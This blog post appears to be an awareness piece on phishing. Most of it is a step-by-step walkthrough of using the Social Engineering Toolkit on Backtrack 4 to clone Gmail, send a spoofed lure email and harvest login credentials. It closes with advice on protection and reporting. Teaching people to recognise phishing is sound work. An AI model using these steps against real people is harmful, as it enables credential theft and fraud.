In this upcoming series of posts, I will demonstrate the different types of phishing attacks from a technical standpoint. Phishing is defined as a "criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication." The electronic communication mostly comes in the form of e-mail or instant messaging. Phishing attacks are becoming more prevalent with time, and the amount of money lost every year by individuals and organizations is rising.
Phishing attacks have been increasing over the last few years. According to a study conducted by the Gartner consulting firm, more than 5 million people in the United States lost money due to phishing attacks as of September 2008, which represents an increase of 39.8% over the previous year. Additionally, the average amount of money lost due to phishing attacks in 2008 was $351, an increase from $256 in 2005. McAfee reported in the white paper, Phishing and Pharming: Understanding Phishing and Pharming, that $1.2 Billion was lost in 2003 due to phishing attacks. In 2007, Gartner reported, $3.2 Billion was lost due to phishing attacks.
These figures alone demonstrate that the general public is either not aware of the types of phishing attacks or not taking them seriously. Another reason for my desire to write this series of posts came after reading numerous articles from individuals who fell victim to these attacks and do not understand how it happened. Furthermore, I recently came across a McAfee-sponsored website named Stop H*Commerce. The website is very informative on how to protect yourself online from phishing attacks and identity theft. There is also a six-episode series showing real-life stories of people whose lives were destroyed by these heartless thieves. Lastly, a security vendor, Panda Security, released the top 10 Internet scams of the last decade, and all ten Internet scams are some form of phishing attack or social engineering.
Now, onto the demonstration. For the first part of the series, I will be presenting a phishing attack to steal login credentials. For simplicity, I will be stealing e-mail credentials, but this process could be used for anything related to credit card information, such as PayPal, online banking credentials, eBay, etc. In short, I will be sending an e-mail containing a link to a spoofed website. In this case, it will be a counterfeit Gmail website. Once the victim clicks the link and enters their login information, that information will automatically be sent back to me and the fraudulent site will redirect the victim to the official Gmail website.
1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools. We will be using the Social Engineering Toolkit, which is included with the Backtrack distribution.
- This link provides detailed instructions on multiple ways to run Backtrack on your computer.
1. Boot up Backtrack. The login is "root" and the password is "toor." Do not include quotes or the period at the end of toor. Type "startx" at the next prompt.
2. Open up a Konsole window. It is the 3rd icon from the bottom right.
3. Type /etc/init.d/networking start and press enter. This will get our IP address that we will need later in this tutorial.
4. Type clear and press enter to clear the screen.
5. Type cd /pentest/exploits/SET and press enter to reach the Social Engineering Toolkit (SET) directory.
6. Type nano config/set_config to change the configuration of the SET.
7. Use the down arrow key until you reach the setting for "WEBATTACK_EMAIL" and make sure it is equal to "ON" instead of "OFF."
8. Hit ctrl + x to exit out of the configuration setting.
9. Now, let us start the SET.
10. Type ./set
11. Select number "2" for Website Attack Vector
12. Select number "3" for Credential Harvester Attack Method
13. Select number "2" for the Site Cloner
14. Now we must decide the site we want to clone. Typically, the attacker will want to clone a website with login authentication. As mentioned earlier, I will clone the site of Gmail. Type https://gmail.com and press enter.
15. We successfully cloned the website!!
16. Press enter again.
17. Type "1" since we are going to be attacking a single e-mail address. At this step, you may also attack as many e-mail addresses as you want by having the e-mail addresses typed in a text file with each one on its own line.
18. Type the e-mail address you want to lure in the phishing attack. As you see in the screenshot below, I typed lilralph713@gmail.com.
19. At this step, we enter a source e-mail or we may spoof our e-mail address through the second option with the use of Sendmail. For simplicity of explanation and ease of intrusion, I will type a source e-mail. I will use shbelay@gmail.com.
20. Since we are using a specific source e-mail, we have to type in our password.
21. Now, for the deceitful e-mail we start with the subject. For this tutorial, I type GMAIL AUTHENTICATION NEEDED IMMEDIATELY!
22. Onto the body of the e-mail, I type CLICK ON THE LINK TO GO TO GMAIL AND CHANGE YOUR PASSWORD! http://192.168.75.128 and press enter.
- The web address I give them is my BackTrack 4 computer's IP address. You can find this out by opening a new shell and typing ifconfig
- An attacker would add HTML coding to this message to hide the true URL address. In essence, the victim would see gmail.com but behind the HTML the URL would be a very similar address or an IP address.
23. Hit ctrl + c to exit the message editing.
25. Now, I go to my Windows XP computer and log in to lilralph@gmail.com to view the message.
|Notice the web address! Users do not usually pay attention to this small detail because they believe what they see and the link that was clicked.|
|Entering my login information|
|Look at the address again. It has changed to the legit Gmail address. Within the login authentication check, the victim's information was sent to the attacker at a remote location.|
The following are policies and procedures that are typically instated in organizations and educational institutions. I will reiterate most of the policies and add what I feel is important.
- Go to Stop H*Commerce and read the "Resource Center" - located at the top menu bar - and educate yourself on phishing techniques and tips on protection.
- Read my previous post, Security Essential for a New Personal Computer.
- Read the Federal Trade Commission's article, How Not to Get Hooked by a "Phishing Scam."
- The Internet Crime Complaint Center (IC3) has some great tips for various cyber crimes @ Internet Crime Prevention Tips.
- Never reply to an e-mail with your username, password, ID, or any other personal information. I cannot imagine an organization asking for this type of information. If it seems real, call the company or the help desk number that is posted on the official website - not the e-mail.
- Never click on a link that directs you to a website where you must login to access information. Open a new tab or window and type the address manually.
- Change all the passwords that were exposed.
- Contact the institution that was being impersonated and inform them of the situation.
- If your social security number, credit card numbers, driver license information, etc. were exposed, contact the following three major credit bureaus: Equifax, Experian, TransUnion.
- If possible, forward the e-mail to the institution that was being impersonated and to the FTC @ email@example.com
- Submit your complaint @ FTC Complaint Assistant. Here is the direct link.
- File a complaint with IC3 @ http://www.ic3.gov/complaint/default.aspx
- Social Engineering (security)
- Phishing and Pharming - Understanding phishing and pharming by McAfee
- Gartner Survey Shows Phishing Attacks Escalated in 2001; More than $3 Billion Lost to These Attacks
- Nigerian scam tops list of decade's online cons